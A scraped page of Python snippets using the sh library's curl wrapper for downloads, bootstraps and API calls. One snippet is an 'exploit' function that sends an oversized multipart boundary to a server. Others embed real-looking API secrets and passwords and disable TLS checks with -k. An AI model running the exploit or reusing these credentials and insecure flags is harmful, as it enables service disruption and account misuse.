Exemplo n.º 1
0
    def install(self):
        arch = list(self.filtered_archs)[0]
        build_dir = self.get_build_dir(arch.arch)
        os.chdir(build_dir)
        hostpython = sh.Command(self.ctx.hostpython)

        #shprint(hostpython, "bootstrap.py")
        #shprint(hostpython, "setup.py", "install", "--prefix=" + join(self.ctx.dist_dir, "hostpython"))

        sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
        shprint(hostpython, "./ez_setup.py")
        # Extract setuptools egg and remove .pth files. Otherwise subsequent
        # python package installations using setuptools will raise exceptions.
        # Setuptools version 28.3.0
        site_packages_path = join(self.ctx.dist_dir, 'hostpython', 'lib',
                                  'python2.7', 'site-packages')
        os.chdir(site_packages_path)
        with open('setuptools.pth', 'r') as f:
            setuptools_egg_path = f.read().strip('./').strip('\n')
            unzip = sh.Command('unzip')
            shprint(unzip, setuptools_egg_path)
        os.remove(setuptools_egg_path)
        os.remove('setuptools.pth')
        os.remove('easy-install.pth')
        shutil.rmtree('EGG-INFO')
Exemplo n.º 2
0
def skeletonize():
    '''Update Skeleton HTML5-Boilerplate.'''
    print green("Skeletonizing the project directory...")

    # Skeleton
    print blue("Installing skeleton HTML5 Boilerplate.")
    os.chdir(PROJ_DIR)
    sh.git.submodule.update(init=True)

    os.chdir(PROJ_DIR + "/skeleton")
    sh.git.pull("origin", "master")
    sh.rsync("-av", "images", "{0}/{1}/static/".format(PROJ_DIR,APP_NAME))
    sh.rsync("-av", "stylesheets",  "{0}/{1}/static/".format(PROJ_DIR,APP_NAME))
    sh.rsync("-av", "index.html",  "{0}/{1}/templates/base_t.html".format(PROJ_DIR,APP_NAME))
    os.chdir(PROJ_DIR)

    # Patch the base template with templating tags
    print blue("Patching the base template.")
    os.chdir(PROJ_DIR + "/{0}/templates/".format(APP_NAME))
    template_patch = open("base_t.patch".format(APP_NAME))
    sh.patch(strip=0, _in=template_patch)
    template_patch.close()
    os.chdir(PROJ_DIR)

    # Jquery
    print blue("Installing jquery 1.9.0.")
    os.chdir(PROJ_DIR + "/" + APP_NAME + "/static/js")
    sh.curl("http://code.jquery.com/jquery-1.9.0.min.js", O=True)
    os.chdir(PROJ_DIR)
def create(version_number):
    heading1("Creating new version based on Fedora " + version_number + "\n")

    # Update git and create new version.
    heading2("Updating master branch.")
    print(git.checkout("master"))
    print(git.pull())  # Bring branch current.

    heading2("Creating new branch")
    print(git.checkout("-b" + version_number))  # Create working branch.

    # Get kickstart files.
    heading2("Creating fedora-kickstarts directory\n")
    mkdir("-p", (base_dir + "/fedora-kickstarts/"))
    cd(base_dir + "/fedora-kickstarts/")

    heading2("Downloading Fedora kickstart files.")
    ks_base = "https://pagure.io/fedora-kickstarts/raw/f" \
              + version_number + "/f"

    for file in ks_files:
        file_path = ks_base + "/fedora-" + file

        print ("Downloading " + file_path)
        curl("-O", file_path)
Exemplo n.º 4
0
    def download_client_config(self, cluster, service):
        """Download the client configuration zip for a particular cluster and service.

        Since cm_api does not provide a way to download the archive we build the URL
        manually and download the file. Once it downloaded the file the archive is
        extracted and its content is copied to the Hadoop configuration directories
        defined by Impala.
        """
        logger.info("Downloading client configuration for {0}".format(
            service.name))
        url = "http://{0}:7180/api/{1}/clusters/{2}/services/{3}/clientConfig".format(
            self.cm_host, CM_API_VERSION, urlquote(cluster.name),
            urlquote(service.name))
        path = mkdtemp()
        sh.curl(url,
                o=os.path.join(path, "clientConfig.zip"),
                _out=tee,
                _err=tee)
        current = os.getcwd()
        os.chdir(path)
        sh.unzip("clientConfig.zip")
        for root, _, file_names in os.walk("."):
            for filename in fnmatch.filter(file_names, "*.xml"):
                src = os.path.join(root, filename)
                dst = os.path.join(self.impala_home, "fe", "src", "test",
                                   "resources")
                logger.debug("Copying {0} to {1}".format(src, dst))
                shutil.copy(src, dst)
        os.chdir(current)
Exemplo n.º 5
0
def setup_vim():
    autoload = join(HOME, '.vim', 'autoload')
    mkdir_p(autoload)
    sh.curl('-fLo', join(autoload, 'plug.vim'), 'https://raw.github.com/junegunn/vim-plug/master/plug.vim')
    link_home('vimrc')

    print '  Running PlugInstall'
    sh.vim('+PlugInstall', '+qall')
Exemplo n.º 6
0
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O",  "https://bootstrap.pypa.io/ez_setup.py")
     dest_dir = join(self.ctx.dist_dir, "root", "python")
     build_env = arch.get_env()
     build_env['PYTHONPATH'] = join(dest_dir, 'lib', 'python2.7', 'site-packages')
     # shprint(hostpython, "./ez_setup.py", "--to-dir", dest_dir)
     shprint(hostpython, "./ez_setup.py", _env=build_env)
Exemplo n.º 7
0
def setup_vim():
    autoload = join(HOME, '.vim', 'autoload')
    mkdir_p(autoload)
    sh.curl('-fLo', join(autoload, 'plug.vim'),
            'https://raw.github.com/junegunn/vim-plug/master/plug.vim')
    link_home('vimrc')

    print '  Running PlugInstall'
    sh.vim('+PlugInstall', '+qall')
Exemplo n.º 8
0
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
     dest_dir = join(self.ctx.dist_dir, "root", "python")
     build_env = arch.get_env()
     build_env['PYTHONPATH'] = join(dest_dir, 'lib', 'python2.7',
                                    'site-packages')
     # shprint(hostpython, "./ez_setup.py", "--to-dir", dest_dir)
     shprint(hostpython, "./ez_setup.py", _env=build_env)
Exemplo n.º 9
0
def test_keyword_arguments():
    from sh import curl, adduser
    # resolves to "curl http://duckduckgo.com/ -o page.html --silent"
    curl('http://duckduckgo.com/', o='page.html', silent=True)

    # or if you prefer not to use keyword arguments, this does the same thing
    curl('http://duckduckgo.com/', '-o', 'page.html', '--silent')

    # resolves to "adduser amoffat --system --shell=/bin/bash --no-create-home"
    adduser('amoffat', system=True, shell='bin/bash', no_create_home=True)
Exemplo n.º 10
0
def add_pr_to_checkout(repo, pr_id, head_sha1, pr_branch, spec):
    sh.curl(
        '-s', '-k', '-L',
        "https://github.com/crowbar/%s/compare/%s...%s.patch" %
        (repo, pr_branch, head_sha1), '-o', 'prtest.patch')
    sh.sed('-i', '-e', 's,Url:.*,%define _default_patch_fuzz 2,', '-e',
           's,%patch[0-36-9].*,,', spec)
    Command('/usr/lib/build/spec_add_patch')(spec, 'prtest.patch')
    iosc('vc', '-m',
         "added PR test patch from %s#%s (%s)" % (repo, pr_id, head_sha1))
Exemplo n.º 11
0
def add_pr_to_checkout(repo, pr_id, head_sha1, pr_branch, spec):
    sh.curl(
        '-s', '-k', '-L',
        "https://github.com/crowbar/%s/compare/%s...%s.patch" % (
            repo, pr_branch, head_sha1),
        '-o', 'prtest.patch')
    sh.sed('-i', '-e', 's,Url:.*,%define _default_patch_fuzz 2,',
           '-e', 's,%patch[0-36-9].*,,', spec)
    Command('/usr/lib/build/spec_add_patch')(spec, 'prtest.patch')
    iosc('vc', '-m', "added PR test patch from %s#%s (%s)" % (
        repo, pr_id, head_sha1))
Exemplo n.º 12
0
def swatch():
    proj()

    print(". rocking the bootswatch plunder")

    themes = json.loads(str(sh.curl("http://api.bootswatch.com")))["themes"]
    for theme in themes:
        print(".. getting %s" % theme["name"])
        open("lib/swatch/bootswatch.%s.min.css" % theme["name"], "w").write(
            re.sub(r'background.*glyphicons[^;]*;', "",
                   str(sh.curl(theme["css-min"]))))
Exemplo n.º 13
0
    def __curl_file(
            container_image_signature_file_path,
            container_image_signature_name,
            signature_server_url,
            signature_server_username,
            signature_server_password
    ):
        """Sends the signature file

        Raises
        ------
        StepRunnerException
            If error pushing image signature.
        """
        # remove any trailing / from url
        signature_server_url = re.sub(r'/$', '', signature_server_url)
        container_image_signature_url = f"{signature_server_url}/{container_image_signature_name}"

        # calculate hashes
        with open(container_image_signature_file_path, 'rb') as container_image_signature_file:
            container_image_signature_file_contents = container_image_signature_file.read()
            signature_file_md5 = hashlib.md5(container_image_signature_file_contents).hexdigest()
            signature_file_sha1 = hashlib.sha1(container_image_signature_file_contents).hexdigest()

        try:
            stdout_result = StringIO()
            stdout_callback = create_sh_redirect_to_multiple_streams_fn_callback([
                sys.stdout,
                stdout_result
            ])

            # -s: Silent
            # -S: Show error
            # -f: Don't print out failure document
            # -v: Verbose
            sh.curl(  # pylint: disable=no-member
                '-sSfv',
                '-X', 'PUT',
                '--header', f'X-Checksum-Sha1:{signature_file_sha1}',
                '--header', f'X-Checksum-MD5:{signature_file_md5}',
                '--user', f"{signature_server_username}:{signature_server_password}",
                '--upload-file', container_image_signature_file_path,
                container_image_signature_url,
                _out=stdout_callback,
                _err_to_out=True,
                _tee='out'
            )
        except sh.ErrorReturnCode as error:
            raise StepRunnerException(
                f"Error pushing signature file to signature server using curl: {error}"
            ) from error

        return container_image_signature_url, signature_file_md5, signature_file_sha1
def exploit(url, username, password):
    #4092 characters
    boundary = "aasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdff"
    content_type = "Content-Type: multipart/form-data; boundary="
    #file of 4097 characters
    file = "/Users/Winston/Desktop/data.txt"
    sh.curl(url,
            anyauth=True,
            X="POST",
            H=content_type + boundary,
            T=file,
            u="%s:%s" % (username, password))
Exemplo n.º 15
0
def reQuerySessions(from_session, to_session, prevSes=None):
    if to_session is None:
        to_session = dbWork.highestSessionId()

    if to_session == 'stdin':
        secRange = prevSes
    else:
        secRange = range(from_session, min(to_session + 1, dbWork.highestSessionId()))

    print('Doing a re-query of previous sessions up to {}'.format(to_session))
    for j in secRange:
        if max(qcRedisRecCountBySession(j), qcDumpRecCountBySession(j)) < dbWork.recCountBySession(j):
            sh.curl('-k', 'https://localhost/backend/qc/report/session/{}'.format(j))
            time.sleep(0.01)
Exemplo n.º 16
0
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
     shprint(hostpython, "./ez_setup.py", _env=self.get_stt_env(arch))
     # Extract setuptools egg and remove .pth files. Otherwise subsequent
     # python package installations using setuptools will raise exceptions.
     # Setuptools version 28.3.0
     site_packages_path = join(self.ctx.dist_dir, 'hostpython2', 'lib',
                               'python2.7', 'site-packages')
     os.chdir(site_packages_path)
     with open('setuptools.pth', 'r') as f:
         setuptools_egg_path = f.read().strip('./').strip('\n')
         unzip = sh.Command('unzip')
         shprint(unzip, setuptools_egg_path)
Exemplo n.º 17
0
def runQC(from_session, to_session, sleep_between, avoid_timeout):
    """
    Runs QC on recordings which haven't been analyzed by QC yet.
    """
    if to_session is None:
        to_session = dbWork.highestSessionId()

    if to_session == 'stdin':
        sesRange = sys.stdin
        prevSes = []
    else:
        sesRange = range(from_session, min(to_session + 1, dbWork.highestSessionId()))

    start = time.time()
    totalDiff = 0
    for i in sesRange:
        # if in individual_sessions mode, strip newline
        if type(i) is str:
            i = i.strip()
        if to_session == 'stdin':
            prevSes.append(i)

        print('Processing session {}'.format(i))
        recsOnDisk = qcDumpRecCountBySession(i)
        recsInRedis = qcRedisRecCountBySession(i)
        recsInDb = dbWork.recCountBySession(i)
        recsDone = max(recsInRedis, recsOnDisk)
        if verbose:
            print('Recs done: {}'.format(recsDone))
            print('..in redis: {}'.format(recsInRedis))
            print('..on disk: {}'.format(recsOnDisk))
            print('..recs in db: {}'.format(recsInDb))
        if (recsDone < recsInDb):
            print('Querying QC for session {}'.format(i))
            sh.curl('-k', 'https://localhost/backend/qc/report/session/{}'.format(i))
            time.sleep(sleep_between)
            diff = dbWork.recCountBySession(i)-recsDone
            totalDiff+=diff
            print('Diff:',diff)

        # also routinely check unfinished sessions already checked to avoid a timeout
        end = time.time()
        if (end - start) > avoid_timeout:
            start = time.time()
            if to_session == 'stdin':
                reQuerySessions(from_session, to_session, prevSes)
            else:
                reQuerySessions(from_session, i)
    print('totalDiff:',totalDiff)
Exemplo n.º 18
0
def check_termination():
    res = sh.curl(
        '-s', 'http://169.254.169.254/latest/meta-data/spot/termination-time')
    mat = re.match('.*T.*Z', str(res))

    # return True if the instance is marked as termination
    return not mat == None
Exemplo n.º 19
0
def check_upgrade():
        server_file = curl(PIFM_HOST + '/client_agent/pifm_agent.py')
        server_sum = awk(
                        md5sum(
                            grep(server_file, '-v', '^PIFM_HOST')
                        ), '{print $1}'
        )

        local_sum = awk(
                        md5sum(
                            grep('-v', '^PIFM_HOST', OUR_SCRIPT)
                        ), '{print $1}'
        )

        if str(server_sum) != str(local_sum):
            logging.info(
                "server: {server}, local: {local}, should update.".format(
                    server=server_sum,
                    local=local_sum
                )
            )
            with open(TMP_SCRIPT, 'w') as f:
                f.write(str(server_file))
            sed('-i',
                "0,/def/ s#http://pi_director#{myhost}#".format(myhost=PIFM_HOST),
                OUR_SCRIPT
                )
            status = python('-m', 'py_compile', TMP_SCRIPT)
            if (status.exit_code == 0):
                shutil.copy(TMP_SCRIPT, OUR_SCRIPT)
                os.chmod(OUR_SCRIPT, 0755)
                sys.exit(0)
Exemplo n.º 20
0
def swatch():
    proj()

    print(". rocking the bootswatch plunder")
    
    themes = json.loads(str(sh.curl("http://api.bootswatch.com")))["themes"]
    for theme in themes:
        print(".. getting %s" % theme["name"])
        open(
            "lib/swatch/bootswatch.%s.min.css" % theme["name"], "w"
        ).write(
            re.sub(
                r'background.*glyphicons[^;]*;',
                "",
                str(sh.curl(theme["css-min"])))
        )
Exemplo n.º 21
0
def search_single(term):
    UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" 
    base = "https://www.google.com/search?q="
    query = base + term 
    res = curl(query, A=UA)
    soup = BeautifulSoup(res.stdout)
    return soup
Exemplo n.º 22
0
def get_api(section, sect_id, page_num=None, with_moves=None):

    have_params = False

    page = ''
    if page_num is not None:
        have_params = True
        page = 'page=' + str(page_num)

    moves_param = ''
    if with_moves is not None:
        have_params = True
        moves_param = 'with_moves=' + str(with_moves)

    params = ''
    if have_params:
        params = '?'
        if page != '':
            params += page
            if moves_param != '':
                params += '&'

        if moves_param != '':
            params += moves_param

    req_str = 'https://lichess.org/api/' + section + '/' + sect_id + params
    print(req_str)
    return sh.curl(req_str)
Exemplo n.º 23
0
def send_email(user, event, message, **kw):
  if not user in config['email']['user_emails']:
    return

  args = {
    'f': config['email']['from_address'],
    't': config['email']['user_emails'][user],
    'u': kw['subject'] if 'subject' in kw else 'Notification',
  }

  if not 'app' in kw:
    kw['app'] = config['default_app']

  body = HTML('html')
  tr = body.table().tr()
  tr.td(valign='top').img(src=config['icons'][kw['app']], style='float:left; margin: 15px')
  try:
    if 'email_body' in kw:
      tr.td().text(kw['email_body'], escape=False)
    else:
      getattr(notifications, event + '_email')(tr.td(), message, **kw)
  except:
    with tr.td().p(style='margin-top: 15px') as p:
      p.b("Message:")
      p.br()
      p.text(message)

  ip = curl('ifconfig.me').strip()
  if ip != config['ip']:
    ybdst = ssh.bake(config['ip'])
    print "Sent %s email to %s" % (event, user)
    return ybdst.sendemail(_in=str(body), **args)
  else:
    print "Sent %s email to %s" % (event, user)
    return sendemail(_in=str(body), **args)
Exemplo n.º 24
0
def fix_bootstrap_py(folder):
    """
    Update boostrap.py to make sure its the latest version.

    This fixes some buildout bootstrapping failures on old sites.
    """
    from sh import curl

    bootstrap_py = os.path.join(folder, "bootstrap.py")

    # http://stackoverflow.com/questions/14817138/zc-buildout-2-0-0-release-somehow-ends-up-breaking-plone-3-3-buildouts/14817272#14817272
    url = "http://downloads.buildout.org/1/bootstrap.py"

    print "Fixing %s to known good version" % bootstrap_py

    curl("-L", "-o", bootstrap_py, url)
Exemplo n.º 25
0
def login(l):
    #login = l.client.post("/iam/v1/authenticate", {"username":"******", "password":'******'})
    token_curl = curl(
        'https://{0}/aims/v1/authenticate'.format('ecepeda-api.route105.net'),
        '-s', '-k', '-X', 'POST', '-H', 'Accept: application/json', '--user',
        '2A6B0U16535H6X0D5822:$2a$12$WB8KmRcUnGpf1M6oEdLBe.GrfBEaa94U4QMBTPMuVWktWZf91AJk'
    )
    return json.loads(str(token_curl))['authentication']['token']
Exemplo n.º 26
0
Arquivo: a.py Projeto: futuregrid/cm
def get_token():
#    curl("-d", "'{\"auth\":{\"passwordCredentials\":{\"username\": \"%(username)s\", \"password\": \"%(password)s\"}}}' -H \"Content-type: application/json\" http://%(ip)s:35357/v2.0/tokens" % data
    result = curl("-d",
		  "'{\"auth\":{\"passwordCredentials\":{\"username\": \"gvonlasz\", \"password\": \"OTg5NmVkZTdkMzEwOThmMDMxZDJmNmY1\"}}}'",
	"-H",
	"\"Content-type: application/json\"",
	"http://149.165.146.50:35357/v2.0/tokens")
    print result
Exemplo n.º 27
0
def curl(src, dest):
    """ Installs `src` to path `dest` """
    spinner = Halo(text="curl {}".format(dest),
                   spinner="dots",
                   placement="right")
    spinner.start()
    if os.path.exists(dest):
        spinner.info("{} already exists".format(dest))
        return

    try:
        sh.curl("-fLo", dest, src)
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error("Error downloading file `%s`: %s", src, err_message)
        spinner.fail()
Exemplo n.º 28
0
 def create_hacking(self, version=None):
     extracts = glob.glob('%s/*' % self.extractdir)
     for extract in extracts:
         dst = os.path.join(extract, 'hacking')
         if not os.path.exists(dst):
             os.makedirs(dst)
             env_dst = os.path.join(dst, 'env-setup')
             logger.debug(env_dst)
             res = curl('-o', env_dst, self.ENV_SETUP)
Exemplo n.º 29
0
 def fullquery(
     self,
     database,
     dataset,
     data_format="j",
     limit=None,
     rows=None,
     start_date=None,
     end_date=None,
     order="asc",
     column_index=None,
     collapse=None,
     transform=None,
     send=False,
 ):
     database = database.upper() + "/"
     dataset = dataset.upper() + typetable[data_format] + "?"
     # validate start and end date arguments and append '&'
     if validate_date(start_date):
         start_date = "start_date=" + start_date + "&"
     else:
         start_date = ""
     if validate_date(end_date):
         end_date = "end_date=" + end_date + "&"
     else:
         end_date = ""
     # hacky solution to Error('Cannot concatenate str and NoneType objects')
     # just set default args to ''
     # what was u thinkin, musta bn hi or some shit
     column_index = "column_index=" + str(column_index) + "&" if column_index else ""
     limit = "limit=" + str(limit) + "&" if limit else ""
     rows = "rows=" + str(rows) + "&" if rows else ""
     column_index = "column_index=" + str(column_index) + "&" if column_index else ""
     collapse = "collapse=" + collapse + "&" if collapse else ""
     transform = "transformation=" + transform + "&" if transform else ""
     order = "order=" + order + "&"
     api_key = "api_key=" + self.APIKEY + "&"
     qstring = (
         self.BASEURL
         + "datasets/"
         + database
         + dataset
         + api_key
         + limit
         + rows
         + start_date
         + end_date
         + order
         + column_index
         + collapse
         + transform
     )
     if send:
         return sh.curl(qstring)
     else:
         return qstring
Exemplo n.º 30
0
def font(name):
    """ Installs fonts using curl.

    Args:
        name (str): The name of the font as defined in `font_library` dictionary.
    """
    spinner = Halo(text="Font {}".format(name),
                   spinner="dots",
                   placement="right")
    spinner.start()
    try:
        library = os.path.join(HOME, "Library/Fonts")
        path = os.path.join(library, name)
        sh.curl("-fLo", path, font_library[name])
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error("Error installing font `%s`: %s", name, err_message)
        spinner.fail()
def send_requests(hostname, throughput, duration, sections_number):
    """

    :param str hostname: destination host or IP
    :param int throughput: number of requests per sec
    :param int duration: in [s]
    :param int sections_number: number of sections
    :return:
    """

    print 'Sending {0} requests per sec for {1} seconds ... '.format(throughput, duration)
    sleep_time = 1 / float(throughput)
    print 'Sleeping {0}[s] between requests.'.format(sleep_time)
    for i in range(0, duration * throughput):
        section_id = random.randint(0, sections_number-1)
        url_path = 'http://{0}/{1}/{2}'.format(hostname, section_id, 'test.html')
        curl(url_path, silent=True)
        print url_path
        time.sleep(sleep_time)
def get_token():
    # curl("-d", "'{\"auth\":{\"passwordCredentials\":{\"username\":
    # \"%(username)s\", \"password\": \"%(password)s\"}}}' -H \"Content-type:
    # application/json\" http://%(ip)s:35357/v2.0/tokens" % data
    result = curl(
        "-d",
        "'{\"auth\":{\"passwordCredentials\":{\"username\": \"gvonlasz\", \"password\": \"OTg5NmVkZTdkMzEwOThmMDMxZDJmNmY1\"}}}'",
        "-H", "\"Content-type: application/json\"",
        "http://149.165.146.50:35357/v2.0/tokens")
    print result
Exemplo n.º 33
0
def do_curl(_url, **kw):
    args = {}
    if 'cookie' in kw:
        cookie = kw['cookie']
        del kw['cookie']
        args['b'] = cookie
    data = urlencode(kw)
    if len(kw) > 0:
        args['d'] = data
    return curl(_url, **args)
Exemplo n.º 34
0
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O",  "https://bootstrap.pypa.io/ez_setup.py")
     shprint(hostpython, "./ez_setup.py")
     # Extract setuptools egg and remove .pth files. Otherwise subsequent
     # python package installations using setuptools will raise exceptions.
     # Setuptools version 28.3.0
     site_packages_path = join(
         self.ctx.dist_dir, 'hostpython',
         'lib', 'python2.7', 'site-packages')
     os.chdir(site_packages_path)
     with open('setuptools.pth', 'r') as f:
         setuptools_egg_path = f.read().strip('./').strip('\n')
         unzip = sh.Command('unzip')
         shprint(unzip, setuptools_egg_path)
     os.remove(setuptools_egg_path)
     os.remove('setuptools.pth')
     os.remove('easy-install.pth')
     shutil.rmtree('EGG-INFO')
Exemplo n.º 35
0
def curl_check_url(url, target_dir):
    """
    tries to get .listing file at url and write to target_dir.

    Args:
        url (str): the URL location of the remote file directory
        target_dir (str): the filepath to write the listing file to

    Returns:
        str: the .listing filepath or None if one wasn't generated

    Raises:
        Exception: whatever exception was raised when things went wrong
    """
    listing_fname = target_dir + "/.listing"
    sh.curl('-l', url, _out=listing_fname)
    if os.path.isfile(listing_fname):
        return listing_fname
    return None
Exemplo n.º 36
0
def do_curl(_url, **kw):
  args = {}
  if 'cookie' in kw:
    cookie = kw['cookie']
    del kw['cookie']
    args['b'] = cookie
  data = urlencode(kw)
  if len(kw) > 0:
    args['d'] = data
  return curl(_url, **args)
Exemplo n.º 37
0
    def _get_code(self, nmpi_job, job_desc):
        """
        Obtain the code and place it in the working directory.

        If the experiment description is the URL of a Git repository, try to clone it.
        If it is the URL of a zip or .tar.gz archive, download and unpack it.
        Otherwise, the content of "code" is the code: write it to a file.
        """
        url_candidate = urlparse(nmpi_job['code'])
        logger.debug("Get code: %s %s", url_candidate.netloc,
                     url_candidate.path)
        if url_candidate.scheme and url_candidate.path.endswith(
            (".tar.gz", ".zip", ".tgz")):
            self._create_working_directory(job_desc.working_directory)
            target = os.path.join(job_desc.working_directory,
                                  os.path.basename(url_candidate.path))
            #urlretrieve(nmpi_job['code'], target) # not working via KIP https proxy
            curl(nmpi_job['code'], '-o', target)
            logger.info("Retrieved file from {} to local target {}".format(
                nmpi_job['code'], target))
            if url_candidate.path.endswith((".tar.gz", ".tgz")):
                tar("xzf", target, directory=job_desc.working_directory)
            elif url_candidate.path.endswith(".zip"):
                try:
                    # -o for auto-overwrite
                    unzip('-o', target, d=job_desc.working_directory)
                except:
                    logger.error("Could not unzip file {}".format(target))
        else:
            try:
                # Check the "code" field for a git url (clone it into the workdir) or a script (create a file into the workdir)
                # URL: use git clone
                git.clone('--recursive', nmpi_job['code'],
                          job_desc.working_directory)
                logger.info("Cloned repository {}".format(nmpi_job['code']))
            except (sh.ErrorReturnCode_128, sh.ErrorReturnCode):
                # SCRIPT: create file (in the current directory)
                logger.info("The code field appears to be a script.")
                self._create_working_directory(job_desc.working_directory)
                with codecs.open(job_desc.arguments[0], 'w',
                                 encoding='utf8') as job_main_script:
                    job_main_script.write(nmpi_job['code'])
Exemplo n.º 38
0
def get_n_save_protprot_page_source(pdb_code):
    '''
    Take a PDB code identifier and gets the Prot-prot page from PDBsum for that
    structure and saves the html as a text file. 

